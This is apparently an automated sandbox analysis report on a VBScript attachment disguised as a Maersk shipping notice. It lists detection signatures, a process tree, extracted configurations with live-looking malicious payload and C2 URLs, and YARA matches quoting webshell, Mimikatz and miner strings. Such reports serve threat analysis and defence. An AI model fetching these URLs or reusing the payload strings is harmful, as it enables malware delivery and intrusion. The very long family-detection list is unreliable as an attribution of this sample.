Play interactive tour

Edit tour

Windows Analysis Report Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Overview

General Information

Sample Name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
Analysis ID:	1607
MD5:	3db65d6cb8c8f1b0e97dfc293d28e295
SHA1:	c3fb70c3613ccdcdac2e4a12df17551ab93a88a4
SHA256:	6394c4e126b8ef4cf8e66d43a54cfd42fd86b3003292f621f0ca427bc12051d8
Infos:
Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos 0x0M4R

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected PasteDownloader

Detected Hacktool Mimikatz

Yara detected BlackMoon Ransomware

Yara detected Snake Keylogger

Yara detected Ragnarok ransomware

Yara detected Evrial Stealer

Yara detected Avaddon Ransomware

Yara detected GhostRat

Yara detected Mini RAT

Yara detected BLACKMatter Ransomware

Yara detected Koadic

Yara detected Jigsaw

Antivirus detection for URL or domain

Yara detected AESCRYPT Ransomware

Yara detected Rapid ransomware

Yara detected RansomwareGeneric

Yara detected Ouroboros ransomware

Yara detected Fiesta Ransomware

Yara detected LimeRAT

Yara detected GuLoader

Yara detected Chaos Ransomware

Yara detected Hancitor

Yara detected TeslaCrypt Ransomware

Found malware configuration

Yara detected Mock Ransomware

Yara detected Conti ransomware

Yara detected Generic Dropper

Yara detected NoCry Ransomware

Yara detected ByteLocker Ransomware

Yara detected RegretLocker Ransomware

Yara detected Crypt ransomware

Yara detected Meterpreter

Yara detected Clop Ransomware

Yara detected Xmrig cryptocurrency miner

Yara detected LockBit ransomware

Yara detected Arcane Stealer

Yara detected LOCKFILE ransomware

Yara detected Cerber ransomware

Yara detected Rhino ransomware

Yara detected Niros Ransomware

Yara detected Buran Ransomware

Yara detected VHD ransomware

Yara detected generic Shellcode Injector

Yara detected Netwalker ransomware

Yara detected Vidar stealer

Yara detected Jcrypt Ransomware

Yara detected Delta Ransomware

Yara detected Predator

Yara detected Mimikatz

Detected HawkEye Rat

Detected Remcos RAT

Yara detected RevengeRAT

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected LaZagne password dumper

Yara detected Metasploit Payload

Yara detected LazParking Ransomware

Yara detected Discord Token Stealer

Yara detected MailPassView

Yara detected Parallax RAT

Yara detected Zeppelin Ransomware

Yara detected Apis Ransomware

Yara detected Wannacry ransomware

Yara detected MegaCortex Ransomware

Yara detected Valak

Yara detected AntiVM3

Yara detected Cobra Locker ransomware

Yara detected RekenSom ransomware

Detected Nanocore Rat

Yara detected Babuk Ransomware

Yara detected Nemty Ransomware

Yara detected NetWire RAT

Yara detected Linux EvilGnome RC5 key

Yara detected Clay Ransomware

Yara detected Thanos ransomware

Yara detected CryLock ransomware

Yara detected Pony

Yara detected OCT Ransomware

Yara detected Snatch Ransomware

Yara detected Coinhive miner

Yara detected Knot Ransomware

Yara detected Gocoder ransomware

Detected Imminent RAT

Yara detected BitCoin Miner

Yara detected WannaRen ransomware

Yara detected Baldr

Multi AV Scanner detection for submitted file

Yara detected Ryuk ransomware

Yara detected Zeoticus ransomware

Yara detected Porn Ransomware

Benign windows process drops PE files

Yara detected DarkSide Ransomware

Malicious sample detected (through community Yara rule)

Yara detected HiddenTear ransomware

Yara detected Telegram RAT

Yara detected WormLocker Ransomware

Yara detected Nephilim Ransomware

Yara detected Mailto ransomware

Yara detected Voidcrypt Ransomware

Yara detected Njrat

Yara detected GoGoogle ransomware

Yara detected Axiom Ransomware

Yara detected Ransomware32

Yara detected Artemon Ransomware

Yara detected Betabot

Yara detected Covid19 Ransomware

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Yara detected CryptoWall ransomware

Yara detected Cryptolocker ransomware

Yara detected Marvel Ransomware

Multi AV Scanner detection for domain / URL

Yara detected Codoso Ghost

Yara detected Cute Ransomware

Yara detected 0x0M4R Ransomware

Yara detected Growtopia

Yara detected Windows Security Disabler

Yara detected Amnesia ransomware

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

May modify the system service descriptor table (often done to hook functions)

Yara detected AllatoriJARObfuscator

Found many strings related to Crypto-Wallets (likely being stolen)

Found potential ransomware demand text

Uses dynamic DNS services

Hides threads from debuggers

Writes to foreign memory regions

Yara detected MSILLoadEncryptedAssembly

Binary or sample is protected by dotNetProtector

C2 URLs / IPs found in malware configuration

May enable test signing (to load unsigned drivers)

Deletes shadow drive data (may be related to ransomware)

Found strings related to Crypto-Mining

Tries to detect Any.run

Found Tor onion address

Sample is not signed and drops a device driver

DLL side loading technique detected

Uses ipconfig to lookup or modify the Windows network settings

Found string related to ransomware

Yara detected VB6 Downloader Generic

Contains functionality to hide user accounts

May drop file containing decryption instructions (likely related to ransomware)

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Java / VBScript file with very long strings (likely obfuscated code)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Creates driver files

Checks if the current process is being debugged

May initialize a security null descriptor

Deletes files inside the Windows folder

Contains functionality to query the security center for anti-virus and firewall products

Found potential string decryption / allocating functions

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Yara detected RemCom RemoteAdmin tool

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Installs a raw input device (often for capturing keystrokes)

PE file contains an invalid checksum

Contains strings related to BOT control commands

Detected TCP or UDP traffic on non-standard ports

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Winexe tool

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Binary contains a suspicious time stamp

Yara detected Keylogger Generic

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

May infect USB drives

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Yara detected Credential Stealer

PE file contains executable resources (Code or Archives)

Contains functionality for execution timing, often used to detect debuggers

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Enables security privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

wscript.exe (PID: 1848 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs' MD5: 0639B0A6F69B3265C1E42227D650B7D1)

ipconfig.exe (PID: 5564 cmdline: ipconfig.exe /release MD5: 62F170FB07FDBB79CEB7147101406EB8)

conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

AZTEKERNES.exe (PID: 3516 cmdline: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe MD5: C7778BEEB7B4EE95495E9268EB7DC6A2)

ieinstal.exe (PID: 2332 cmdline: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

ipconfig.exe (PID: 312 cmdline: 'C:\Windows\System32\ipconfig.exe' /renew MD5: 62F170FB07FDBB79CEB7147101406EB8)

conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mpam-25cd2963.exe (PID: 6192 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe' /q WD MD5: BBC0691332F6E1994993322482AD8480)

MpSigStub.exe (PID: 4180 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

wevtutil.exe (PID: 3364 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

wevtutil.exe (PID: 4860 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mpam-77b29277.exe (PID: 6444 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe MD5: 34B7B3BDFA61E18D3B2C3B0AC92B78EF)

MpSigStub.exe (PID: 4520 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin"}

Threatname: Pony

{"C2 list": ["http://download.enet.com.cn/search.php?keyword=%s", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://ow.ly/QoHbJ", "http://santasalete.sp.gov.br/jss/", "http://www.redirserver.com/update4.cfm?tid=&cn_id=", "http://194.5.249.107/2nquxqz2ok4a45l.php", "http://www.youndoo.com/?z=", "http://%s%simg.jpg", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://vod.7ibt.com/index.php?url=", "http://microhelptech.com/gotoassist/", "http://malikberry.com/files101/htamandela.hta", "http://%domain%/update.php", "http://d.sogou.com/music.so?query=%s", "http://%s:%d/%s%d%08d", "http://%s:%i%s?mod=cmd", "http://pages", "http://www.zxboy.com#http://", "http://p.zhongsou.com/p?w=%s", "http://88888888.7766.org/ExeIni", "http://update.7h4uk.com:443/antivirus.php", "http://23.95.122.25/..-.-................-.....-------------/..............................................................................................dot\"targetmode=\"external\"/></relationships>", "http://flash.chinaren.com/ip/ip.php", "http://jump.qq.com/clienturl_15", "http://dialup.carpediem.fr/perl/countdialupinter.pl?", "http://www.piram.com.br/hosts.txt", "http://www.now.cn/?SCPMCID=", "http://110.42.4.180:", "http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s", "http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp", "http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/", "http://www.cashon.co.kr/app/app.php?url=", "http://stats.hosting24.com/count.php", "http://192.189.25.17/cgbin/ukbros", "http://pig.zhongsou.com/helpsimple/help.htm", "http://zsxz.zhongsou.com/route/", "http://whatami.us.to/tc", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://23.249.163.163/qwerty.exe", "http://92.222.7.", "http://darkside", "http://so1.5k5.net/interface?action=install&p=", "http://www.gamedanji.cn/ExeIni", "http://gosgd.com", "http://find.verycd.com/folders?cat=movie&kw=%s", "http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://www.cashon.co.kr/app/uninstall.php?", "http://www.moliv.com.br/stat/email0702/", "http://foo.w97.cn/data/file/kwbuf.ini", "http://chemgioaz.blogspot.com/ ", "http://init.icloud-analysis.com", "http://img.zhongsou.com/i?w=%s", "http://new.beahh.com/startup.php", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://instamailserver.link/finito.ps1", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://mp3.baidu.com/m?tn=baidump3lyric&ct=", "http://3dplayful.blogspot.com/ ", "http://stroyprivoz.ru/dokumente-vom-notar/", "http://a.pomf.cat/", "http://hotedeals.co.uk/ekck095032/", "http://www.iask.com/s?k=%s", "http://vidquick.info/cgi/", "http://gg", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://search.newhua.com/search.asp?Keyword=%s", "http://(www|corail)\\\\.sudoc", "http://stat.wamme.cn/C8C/gl/cnzz60.html", "http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline", "http://mp3.zhongsou.com/m?w=%s", "http://yc.book.sohu.com/series_list.php?select=1&text=%s", "http://kremlin-malwrhunterteam.info/scan.exe", "http://8nasrcity.blogspot.com/ ", "http://www.preyer.it/ups.com/", "http://bittupadam.blogspot.com/", "http://search.btchina.net/search.php?query=%s", "http://www.bluelook.es/bvvtbbh.php", "http://articlunik.blogspot.com/", "http://localhost:62338/Chipsetsync.asmx", "http://www.microsoft.com0", "http://%20%20@j.mp/as", "http://ys.cn.yahoo.com/mohu/index.html?p=%s", "http://coltaddict.blogspot.com/", "http://jump.qq.com/clienturl_100?clientuin=", "http://www.ip.com.cn/idcard.php?q=%s", "http://www.thon-samson.be/js/_notes/", "http://rl.ammyy.com", "http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14", "http://animefrase.blogspot.com/", "http://binyousafindustries.com/fonts/jo/mops.exe", "http://images.google.cn/images?q=%s", "http://aindonashi.blogspot.com/", "http://alindaenua.blogspot.com/", "http://v.iask.com/v?tag=&k=%s", "http://www.w3.org/1999/xsl/transform", "http://95.173.183.", "http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint@truvo.be", "http://www.cashon.co.kr/search/search.php", "http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=", "http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/", "http://vequiato.sites.uol.com.br/", "http://</t></si><si><t>188.127.231.", "http://127.0.0.1:20202/remind.html", "http://92.38.135.46/43cfqysryip51zzq.php", "http://%s%s", "http://208.95.104.", "http://abeidaman.blogspot.com/ ", "http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx", "http://20vp.cn/moyu/", "http://www.look2me.com", "http://www.wosss.com/search.aspx?q=%s", "http://www.3322.org/dyndns/getip", "http://www.ip.com.cn/ip.php?q=%s", "http://81.177.26.20/ayayay", "http://cvfanatic.blogspot.com/ ", "http://best4hack.blogspot.com/ ", "http://cicahroti.blogspot.com/ ", "http://www.j.mp/", "http://anomaniez.blogspot.com/ ", "http://62.210.214.", "http://bonkersmen.blogspot.com/", "http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php", "http://search.17173.com/index.jsp?keyword=%s", "http://www.22teens.com/", "http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk", "http://%s:%i%s", "http://vidscentral.net/inc/6348852", "http://download.zhongsou.com/cdsearch/", "http://babukq4e2p4wu4iq.onion", "http://aspx.vod38.com/", "http://200.159.128.", "http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s", "http://www.soso.com/q?w=%s", "http://kavok.ind.br/ds/2312.gif", "http://www.tempuri.org/DataSet1.xsd", "http://batrasiaku.blogspot.com/", "http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/", "http://bigboobsp.blogspot.com/ ", "http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com\"target=\"_blank", "http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=", "http://www.look2me.com/products/", "http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/", "http://ks.pconline.com.cn/index.jsp?qx=download&q=%s", "http://blog.x-row.net/", "http://ads.8866.org/", "http://spotdewasa.blogspot.com/", "http://www.zhongsou.com/kefu/zskf.htm", "http://bit.ly", "http://adsl.carpediem.fr/perl/invoc_oneway.pl?", "http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/", "http://31.192.210.", "http://www.daybt.com/query.asp?q=%s", "http://3117488091/lib/jquery-3.2.1.min.js", "http://funsiteshere.com/redir.php", "http://pic.sogou.com/pics?query=%s", "http://softthrifty.com/security.jsp", "http://www.tq121.com.cn/", "http://dialup.carpediem.fr/perl/dialup.pl", "http://z1.nf-2.net/512.txt", "http://alhalm-now.blogspot.com/", "http://31.192.209.", "http://94.102.14.", "http://aolopdephn.blogspot.com/", "http://50.63.128.", "http://dontkillme/", "http://agressor58.blogspot.com/", "http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php", "http://gosgd2.com", "http://musah.info/", "http://berkah2013.blogspot.com/", "http://wevx.xyz/post.php?uid=", "http://search.union.yahoo.com.cn/click/search.htm?m=", "http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s", "http://www.sagawa-exp.co.jp/", "http://www.look2me.com/cgi", "http://lo0oading.blogspot.com/ ", "http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e", "http://61.19.253.", "http://www.klikspaandelft.nl/", "http://xn--", "http://www.trotux.com/?z=", "http://arifkacip.blogspot.com/ ", "http://clients.lb1networks.com/upd.php?", "http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s", "http://go.58.com/?f=", "http://aspx.qqus.net/wanmei/login.asp", "http://afkar.today/test_coming.training/w_f/", "http://www.3000.ws/", "http://js.pkglayer.com", "http://p.iask.com/p?k=%s", "http://hostthenpost.org/uploads/", "http://www.iciba.com/search?s=%s", "http://%domain%/config.php", "http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=", "http://rapidshare.com/files/", "http://www.mypaymate.com/dialerplatform/tmp.htm", "http://www.baidu.com/baidu?tn=", "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s", "http://www.sogou.com/web?query=%s", "http://www.sacbarao.kinghost.net/", "http://www.2345.com", "http://203.199.200.61", "http://music.cn.yahoo.com/lyric.html?p=%s", "http://ahmad-roni.blogspot.com/", "http://www.inet4you.com/exit/", "http://185.153.198.216:8010/UserService", "http://search.crsky.com/search.asp?sType=ResName&keyword=%s", "http://www.google.cn/search?q=%s", "http://games.enet.com.cn/article/SearchCategory.php?key=%s", "http://citw-vol2.blogspot.com/ ", "http://ks.pcgames.com.cn/games_index.jsp?q=%s", "http://music.soso.com/q?sc=mus&w=%s", "http://ksn.a", "http://webpatch.ragnarok.co.kr/", "http://2010-kpss.blogspot.com/ ", "http://image.soso.com/image.cgi?w=%s", "http://cbl.toolbar4free.com/cgi-bin/s.exe", "http://aitimatafb.blogspot.com/", "http://61.160.222.11:", "http://mp3.baidu.com/m?tn=", "http://%s/ftp/g.php", "http://weather.265.com/%s", "http://toolbar.deepdo.com/download/", "http://888888.2288.org/Monitor_INI", "http://%s/any2/%s-direct.ex", "http://www.ip.com.cn/mobile.php?q=%s", "http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname", "http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&amp;dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&amp;dyfm=cpjyicit", "http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/", "http://www.qq994455.com/", "http://%s", "http://www.ip.com.cn/tel.php?q=%s", "http://community.derbiz.com/", "http://31.192.211.", "http://\"+hashdate().tostring(16)+\".eu/script.html", "http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a", "http://errors.statsmyapp.com/installer-error.gif?action=wrapper", "http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/", "http://fateh.aba.ae/xyzx.zip", "http://www.ip138.com", "http://gaigoixxx.blogspot.com/ ", "http://batysnewskz.kz/ups.com", "http://104.236.94.", "http://70.38.40.185", "http://1bestgate.blogspot.com/ ", "http://0.82211.net/", "http://dl.dropbox.com/u/", "http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/", "http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw", "http://acayipbiri.blogspot.com/", "http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/", "http://fateh.aba.ae/abc.zip", "http://www.agendagyn.com/media/fotos/2010/", "http://avnisevinc.blogspot.com/", "http://www.linkinc.es/scss/water.php", "http://ip-api.com/", "http://autothich.blogspot.com/ ", "http://www.cashon.co.kr/app/install.php?", "http://178.79.137.25/campo/", "http://srmvx.com.br/uploads/", "http://cert.beahh.com/cert.php", "http://calleveinte.com.mx/ups-quantum-view", "http://cs.zhongsou.com/", "http://foo.w97.cn/SoftInterFace/SearchNum.aspx", "http://weather.265.com/get_weather.php?action=get_city", "http://tempuri.org/", "http://tool.world2.cn/toolbar/", "http://mitotl.com.mx/ups.com/", "http://www.yodao.com/search?ue=utf8&q=%s", "http://%20%20@j.mp/axas", "http://aancyber77.blogspot.com/", "http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/", "http://www.", "http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=", "http://arthisoft.blogspot.com/ ", "http://sf3q2wrq34.ddns.net"]}

Threatname: Metasploit

{"Type": "Execute Command", "Command": "\u0001"}

Threatname: CryLock

{"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api  Intel(R) Core(TM)2 CPU         T7200  @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32ce:$s1: stratum+tcp://
00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x14218:$: \\.\pipe\%s%s%d
00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xfc4e:$payload_and_input1: eval(request. 0xfc4c:$tagasp_short1: <%e 0xfc71:$tagasp_short2: %> 0xfc4c:$tagasp_long13: <%ev 0xa223:$jsp4: public 0xa281:$jsp4: public
00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xfc8b:$asp_much_sus8: WebShell 0x69f8:$asp_much_sus15: AntiVirus 0x711c:$asp_much_sus15: AntiVirus 0x7f45:$asp_much_sus15: antivirus 0x8022:$asp_much_sus15: antivirus 0x8036:$asp_much_sus15: antivirus 0xd81f:$asp_much_sus15: Antivirus 0xfc67:$asp_much_sus18: "unsafe 0x10610:$asp_much_sus28: exploit 0xe44e:$asp_gen_sus11: "cmd.exe 0xf095:$asp_gen_sus11: "cmd.exe 0x102e8:$asp_gen_sus12: %comspec% 0xfcb0:$asp_gen_sus25: shell_ 0xfd73:$asp_gen_obf1: "+" 0x10188:$asp_gen_obf1: "+" 0x1018d:$asp_gen_obf1: "+" 0x10193:$asp_gen_obf1: "+" 0x1019a:$asp_gen_obf1: "+" 0x1019f:$asp_gen_obf1: "+" 0x101a4:$asp_gen_obf1: "+" 0xfc4c:$tagasp_short1: <%e
00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0xf57f:$x1: zxplug -add 0xf58b:$x2: getxxx c:\xyz.dll
00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xf2c9:$payload_and_input1: eval(request. 0xf2a9:$tagasp_short1: <%@ 0xf2c7:$tagasp_short1: <%e 0x3aad6:$tagasp_short1: <%\x1D 0x3de99:$tagasp_short1: <%\xC4 0x19cc7:$tagasp_short2: %> 0x2ca67:$tagasp_short2: %> 0x2d5b7:$tagasp_short2: %> 0x2e417:$tagasp_short2: %> 0x368a6:$tagasp_short2: %> 0xf2c7:$tagasp_long13: <%ev
00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x35278:$s1: sekurlsa::msv 0x352fa:$s7: sekurlsa::ssp 0x352b9:$s11: sekurlsa::pth
00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x20e9d:$x4: reflective_inject_dll 0x20e9d:$x8: reflective_inject_dll 0x20e9d:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2ccb:$s1: stratum+tcp://
00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x2f54e:$s1: stratum+tcp://
00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
